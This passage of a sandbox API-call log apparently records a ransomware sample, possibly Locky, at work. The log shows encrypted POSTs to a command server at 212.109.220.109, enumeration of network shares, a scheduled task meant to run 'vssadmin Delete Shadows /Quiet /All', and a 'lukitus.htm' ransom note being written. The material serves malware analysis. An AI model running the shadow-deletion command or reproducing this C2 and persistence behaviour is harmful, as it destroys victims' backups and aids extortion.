(hInternet=0xcc000c, dwOption=0x4d, lpBuffer=0x0, dwBufferLength=0x0) returned 1 [0090.354] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*\r\nAccept-Language: en-us\r\nReferer: http://212.109.220.109/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache", dwHeadersLength=0xd1, dwModifiers=0xa0000000) returned 1 [0090.354] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x572a08*, dwOptionalLength=0x3f0 | out: lpOptional=0x572a08*) returned 1 [0092.454] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x18eabc, lpdwBufferLength=0x18eaa4, lpdwIndex=0x0 | out: lpBuffer=0x18eabc*, lpdwBufferLength=0x18eaa4*=0x4, lpdwIndex=0x0) returned 1 [0092.454] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x18eabc, lpdwBufferLength=0x18eaa4, lpdwIndex=0x0 | out: lpBuffer=0x18eabc*, lpdwBufferLength=0x18eaa4*=0x4, lpdwIndex=0x0) returned 1 [0092.454] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x572280, dwNumberOfBytesToRead=0x4c1, lpdwNumberOfBytesRead=0x18eab8 | out: lpBuffer=0x572280*, lpdwNumberOfBytesRead=0x18eab8*=0x4c1) returned 1 [0092.454] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0092.454] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0092.454] CryptHashData (hHash=0x5fc098, pbData=0x572280, dwDataLen=0x4ad, dwFlags=0x0) returned 1 [0092.454] CryptGetHashParam (in: hHash=0x5fc098, dwParam=0x2, pbData=0x18f874, pdwDataLen=0x18f8f4, dwFlags=0x0 | out: pbData=0x18f874, pdwDataLen=0x18f8f4) returned 1 [0092.454] CryptDestroyHash (hHash=0x5fc098) returned 1 [0092.454] CryptDestroyKey (hKey=0x5fc058) returned 1 [0092.454] CryptDestroyHash (hHash=0x5fc018) returned 1 [0092.454] CryptDestroyKey (hKey=0x5fbfd8) returned 1 [0092.454] GetUserDefaultUILanguage () returned 0x409 [0092.454] GetLocaleInfoA (in: Locale=0x409, LCType=0x59, lpLCData=0x18fcb8, cchData=32 | out: lpLCData="en") returned 3 [0092.454] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x1, pbBuffer=0x18fcc3 | out: pbBuffer=0x18fcc3) returned 1 [0092.454] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x20, pbBuffer=0x18fbac | out: pbBuffer=0x18fbac) returned 1 [0092.454] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x18f824, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x18fc80 | out: phKey=0x18fc80*=0x5fbfd8) returned 1 [0092.454] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5fbfd8, dwFlags=0x0, phHash=0x18fc84 | out: phHash=0x18fc84) returned 1 [0092.454] CryptSetHashParam (hHash=0x5fc018, dwParam=0x5, pbData=0x18f8a8, dwFlags=0x0) returned 1 [0092.454] CryptImportKey (in: hProv=0x5d0ba0, pbData=0x18f824, dwDataLen=0x8c, hPubKey=0x0, dwFlags=0x100, phKey=0x18fc78 | out: phKey=0x18fc78*=0x5fc058) returned 1 [0092.454] CryptCreateHash (in: hProv=0x5d0ba0, Algid=0x8009, hKey=0x5fc058, dwFlags=0x0, phHash=0x18fc7c | out: phHash=0x18fc7c) returned 1 [0092.454] CryptSetHashParam (hHash=0x5fc098, dwParam=0x5, pbData=0x18f8a8, dwFlags=0x0) returned 1 [0092.454] CryptHashData (hHash=0x5fc018, pbData=0x571600, dwDataLen=0xd6, dwFlags=0x0) returned 1 [0092.454] CryptGetHashParam (in: hHash=0x5fc018, dwParam=0x2, pbData=0x18fbcd, pdwDataLen=0x18fcbc, dwFlags=0x0 | out: pbData=0x18fbcd, pdwDataLen=0x18fcbc) returned 1 [0092.454] CryptEncrypt (in: hKey=0x5f2330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x18fbac*, pdwDataLen=0x18f8f8*=0x35, dwBufLen=0x80 | out: pbData=0x18fbac*, pdwDataLen=0x18f8f8*=0x80) returned 1 [0092.454] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.455] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.456] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f8e4 | out: pbBuffer=0x18f8e4) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] CryptGenRandom (in: hProv=0x5d0ba0, dwLen=0x4, pbBuffer=0x18f824 | out: pbBuffer=0x18f824) returned 1 [0092.457] InternetCrackUrlA (in: lpszUrl="http://212.109.220.109/imageload.cgi", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x18eacc | out: lpUrlComponents=0x18eacc) returned 1 [0092.457] InternetConnectA (hInternet=0xcc0004, lpszServerName="212.109.220.109", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0092.457] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/imageload.cgi", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844c0300, dwContext=0x0) returned 0xcc000c [0092.457] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x4d, lpBuffer=0x0, dwBufferLength=0x0) returned 1 [0092.457] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*\r\nAccept-Language: en-us\r\nReferer: http://212.109.220.109/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache", dwHeadersLength=0xd1, dwModifiers=0xa0000000) returned 1 [0092.457] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x57e9c0*, dwOptionalLength=0x3a8 | out: lpOptional=0x57e9c0*) returned 1 [0093.338] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x18eabc, lpdwBufferLength=0x18eaa4, lpdwIndex=0x0 | out: lpBuffer=0x18eabc*, lpdwBufferLength=0x18eaa4*=0x4, lpdwIndex=0x0) returned 1 [0093.338] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x18eabc, lpdwBufferLength=0x18eaa4, lpdwIndex=0x0 | out: lpBuffer=0x18eabc*, lpdwBufferLength=0x18eaa4*=0x4, lpdwIndex=0x0) returned 1 [0093.339] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x28a0048, dwNumberOfBytesToRead=0x239a, lpdwNumberOfBytesRead=0x18eab8 | out: lpBuffer=0x28a0048*, lpdwNumberOfBytesRead=0x18eab8*=0x239a) returned 1 [0093.382] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0093.382] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0093.382] CryptHashData (hHash=0x5fc098, pbData=0x28a0048, dwDataLen=0x2386, dwFlags=0x0) returned 1 [0093.382] CryptGetHashParam (in: hHash=0x5fc098, dwParam=0x2, pbData=0x18f874, pdwDataLen=0x18f8f4, dwFlags=0x0 | out: pbData=0x18f874, pdwDataLen=0x18f8f4) returned 1 [0093.382] CryptDestroyHash (hHash=0x5fc098) returned 1 [0093.382] CryptDestroyKey (hKey=0x5fc058) returned 1 [0093.382] CryptDestroyHash (hHash=0x5fc018) returned 1 [0093.382] CryptDestroyKey (hKey=0x5fbfd8) returned 1 [0093.383] WNetOpenEnumW (in: dwScope=0x1, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x18fc3c | out: lphEnum=0x18fc3c*=0x60b2b0) returned 0x0 [0093.516] WNetEnumResourceW (in: hEnum=0x60b2b0, lpcCount=0x18fc40, lpBuffer=0x28a23f0, lpBufferSize=0x18fc44 | out: lpcCount=0x18fc40, lpBuffer=0x28a23f0, lpBufferSize=0x18fc44) returned 0x103 [0093.517] WNetCloseEnum (hEnum=0x60b2b0) returned 0x0 [0093.517] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x18fc30 | out: lphEnum=0x18fc30*=0x5fc098) returned 0x0 [0093.517] WNetEnumResourceW (in: hEnum=0x5fc098, lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38 | out: lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38) returned 0x0 [0093.517] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x28a23f0, lphEnum=0x18fbc0 | out: lphEnum=0x18fbc0*=0x5f3590) returned 0x0 [0093.518] WNetEnumResourceW (in: hEnum=0x5f3590, lpcCount=0x18fbc4, lpBuffer=0x28a43f8, lpBufferSize=0x18fbc8 | out: lpcCount=0x18fbc4, lpBuffer=0x28a43f8, lpBufferSize=0x18fbc8) returned 0x103 [0093.521] WNetCloseEnum (hEnum=0x5f3590) returned 0x0 [0093.521] WNetEnumResourceW (in: hEnum=0x5fc098, lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38 | out: lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38) returned 0x0 [0093.521] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x28a23f0, lphEnum=0x18fbc0 | out: lphEnum=0x18fbc0*=0x5f3590) returned 0x4b8 [0105.831] WNetEnumResourceW (in: hEnum=0x5fc098, lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38 | out: lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38) returned 0x0 [0105.831] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x28a23f0, lphEnum=0x18fbc0 | out: lphEnum=0x18fbc0*=0x5f3590) returned 0x4c6 [0105.832] WNetEnumResourceW (in: hEnum=0x5fc098, lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38 | out: lpcCount=0x18fc34, lpBuffer=0x28a23f0, lpBufferSize=0x18fc38) returned 0x103 [0105.832] WNetCloseEnum (hEnum=0x5fc098) returned 0x0 [0105.832] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x18fc24 | out: lphEnum=0x18fc24*=0x5f36b0) returned 0x0 [0105.832] WNetEnumResourceW (in: hEnum=0x5f36b0, lpcCount=0x18fc28, lpBuffer=0x28a23f0, lpBufferSize=0x18fc2c | out: lpcCount=0x18fc28, lpBuffer=0x28a23f0, lpBufferSize=0x18fc2c) returned 0x103 [0105.832] WNetCloseEnum (hEnum=0x5f36b0) returned 0x0 [0105.832] GetLogicalDrives () returned 0x4 [0105.832] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0105.832] GetVolumeInformationW (in: lpRootPathName="c:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x18fcc0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x18fcc0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1 [0105.832] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x428b40, lpParameter=0x571350, dwCreationFlags=0x0, lpThreadId=0x18fec4 | out: lpThreadId=0x18fec4*=0x880) returned 0x314 [0105.833] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0105.835] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0105.837] LoadLibraryA (lpLibFileName="vssapi.dll") returned 0x743d0000 [0105.905] GetProcAddress (hModule=0x743d0000, lpProcName="CreateVssBackupComponentsInternal") returned 0x743ed400 [0105.905] GetProcAddress (hModule=0x743d0000, lpProcName="VssFreeSnapshotPropertiesInternal") returned 0x743e77f9 [0105.905] ?CreateVssBackupComponents@@YGJPAPAVIVssBackupComponents@@@Z () returned 0x80070005 [0105.932] FreeLibrary (hLibModule=0x743d0000) returned 1 [0105.934] GetSystemDirectoryW (in: lpBuffer=0x18f9fc, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.934] GetTickCount () returned 0x2227d [0105.934] Sleep (dwMilliseconds=0xa) [0105.937] GetTickCount () returned 0x2228d [0105.937] Sleep (dwMilliseconds=0xa) [0105.957] GetTickCount () returned 0x2229c [0105.957] Sleep (dwMilliseconds=0xa) [0105.968] GetTickCount () returned 0x222ac [0105.968] Sleep (dwMilliseconds=0xa) [0105.983] GetTickCount () returned 0x222bc [0105.983] Sleep (dwMilliseconds=0xa) [0105.998] GetTickCount () returned 0x222cb [0105.998] Sleep (dwMilliseconds=0xa) [0106.037] GetTickCount () returned 0x222ea [0106.037] Sleep (dwMilliseconds=0xa) [0106.052] GetTickCount () returned 0x222fa [0106.052] Sleep (dwMilliseconds=0xa) [0106.061] GetTickCount () returned 0x2230a [0106.061] lstrlenA (lpString="omeyvbrx") returned 8 [0106.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18fb44, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0106.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18fb44, cbMultiByte=9, lpWideCharStr=0x18fa90, cchWideChar=9 | out: lpWideCharStr="omeyvbrx") returned 9 [0106.061] CoCreateInstance (in: rclsid=0x47a4f4*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x47a2e4*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18fbdc | out: ppv=0x18fbdc*=0x8113c0) returned 0x0 [0106.091] TaskScheduler:ITaskService:Connect (This=0x8113c0, serverName=0x18fad8*(varType=0x0, wReserved1=0x57, wReserved2=0xfc40, wReserved3=0x18, varVal1=0x0, varVal2=0x572e70), user=0x18fae8*(varType=0x0, wReserved1=0x57, wReserved2=0xfb4c, wReserved3=0x18, varVal1=0x751e14dd, varVal2=0x570000), domain=0x18faf8*(varType=0x0, wReserved1=0x0, wReserved2=0x20, wReserved3=0x0, varVal1=0xd, varVal2=0x18fc40), password=0x18fb08*(varType=0x0, wReserved1=0x18, wReserved2=0x6b90, wReserved3=0x47, varVal1=0x0, varVal2=0x18fbc0)) returned 0x0 [0106.102] TaskScheduler:ITaskService:GetFolder (in: This=0x8113c0, Path="\\", ppFolder=0x18fbcc | out: ppFolder=0x18fbcc*=0x2580c78) returned 0x0 [0106.104] TaskScheduler:ITaskService:NewTask (in: This=0x8113c0, flags=0x0, ppDefinition=0x18fbd4 | out: ppDefinition=0x18fbd4*=0x25809b0) returned 0x0 [0106.105] ITaskDefinition:get_Settings (in: This=0x25809b0, ppSettings=0x18fbd8 | out: ppSettings=0x18fbd8*=0x2580b20) returned 0x0 [0106.105] ITaskSettings:put_AllowDemandStart (This=0x2580b20, AllowDemandStart=1) returned 0x0 [0106.105] ITaskSettings:put_StopIfGoingOnBatteries (This=0x2580b20, StopIfGoingOnBatteries=0) returned 0x0 [0106.105] ITaskSettings:put_StartWhenAvailable (This=0x2580b20, StartWhenAvailable=1) returned 0x0 [0106.106] ITaskSettings:put_DisallowStartIfOnBatteries (This=0x2580b20, DisallowStartIfOnBatteries=0) returned 0x0 [0106.106] ITaskDefinition:get_Actions (in: This=0x25809b0, ppActions=0x18fbb4 | out: ppActions=0x18fbb4*=0x2580a28) returned 0x0 [0106.106] IActionCollection:Create (in: This=0x2580a28, Type=0, ppAction=0x18fbb0 | out: ppAction=0x18fbb0*=0x2581490) returned 0x0 [0106.106] IUnknown:QueryInterface (in: This=0x2581490, riid=0x47a444*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18fbd0 | out: ppvObject=0x18fbd0*=0x2581490) returned 0x0 [0106.106] IExecAction:put_Path (This=0x2581490, Path="C:\\Windows\\system32\\vssadmin.exe") returned 0x0 [0106.106] IExecAction:put_Arguments (This=0x2581490, Arguments="Delete Shadows /Quiet /All") returned 0x0 [0106.106] lstrlenA (lpString="SYSTEM") returned 6 [0106.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18fbb8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0106.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18fbb8, cbMultiByte=7, lpWideCharStr=0x18fa90, cchWideChar=7 | out: lpWideCharStr="SYSTEM") returned 7 [0106.106] SysStringByteLen (bstr="SYSTEM") returned 0xc [0106.106] ITaskFolder:RegisterTaskDefinition (in: This=0x2580c78, Path="omeyvbrx", pDefinition=0x25809b0, flags=6, UserId=0x18fae0*(varType=0x8, wReserved1=0x18, wReserved2=0x6b90, wReserved3=0x47, varVal1="SYSTEM", varVal2=0x18fbc0), password=0x18faf0*(varType=0x0, wReserved1=0x18, wReserved2=0x6b90, wReserved3=0x47, varVal1=0x0, varVal2=0x18fbc0), LogonType=5, sddl=0x18fb04*(varType=0x8, wReserved1=0x0, wReserved2=0x20, wReserved3=0x0, varVal1="", varVal2=0x18fc40), ppTask=0x18fbe0 | out: ppTask=0x18fbe0*=0x0) returned 0x80070005 [0106.162] IUnknown:Release (This=0x2581490) returned 0x2 [0106.162] IUnknown:Release (This=0x2581490) returned 0x1 [0106.162] IUnknown:Release (This=0x2580a28) returned 0x1 [0106.162] IUnknown:Release (This=0x2580b20) returned 0x1 [0106.162] IUnknown:Release (This=0x25809b0) returned 0x0 [0106.162] IUnknown:Release (This=0x2580c78) returned 0x0 [0106.162] TaskScheduler:IUnknown:Release (This=0x8113c0) returned 0x0 [0106.162] CoUninitialize () [0106.164] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0xffffffff) returned 0x0 [0111.900] AddAtomA (lpString="_56924BE966341BB") returned 0xc000 [0111.903] GlobalAddAtomA (lpString="_56924BE966341BB") returned 0xc130 [0111.903] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x18f96c | out: pszPath="C:\\Users\\aETAdzjz\\Desktop") returned 0x0 [0111.906] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\lukitus.htm", lpFindFileData=0x18f938 | out: lpFindFileData=0x18f938) returned 0xffffffff [0111.907] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\Desktop\\lukitus.htm" (normalized: "c:\\users\\aetadzjz\\desktop\\lukitus.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0111.908] DeviceIoControl (in: hDevice=0x330, dwIoControlCode=0x9c040, lpInBuffer=0x18fb74*, nInBufferSize=0x2, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x18fb68, lpOverlapped=0x0 | out: lpInBuffer=0x18fb74*, lpOutBuffer=0x0*, lpBytesReturned=0x18fb68*=0x0, lpOverlapped=0x0) returned 1 [0111.908] WriteFile (in: hFile=0x330, lpBuffer=0x28a0048*, nNumberOfBytesToWrite=0x22aa, lpNumberOfBytesWritten=0x18fb5c, lpOverlapped=0x0 | out: lpBuffer=0x28a0048*, lpNumberOfBytesWritten=0x18fb5c*=0x22aa, 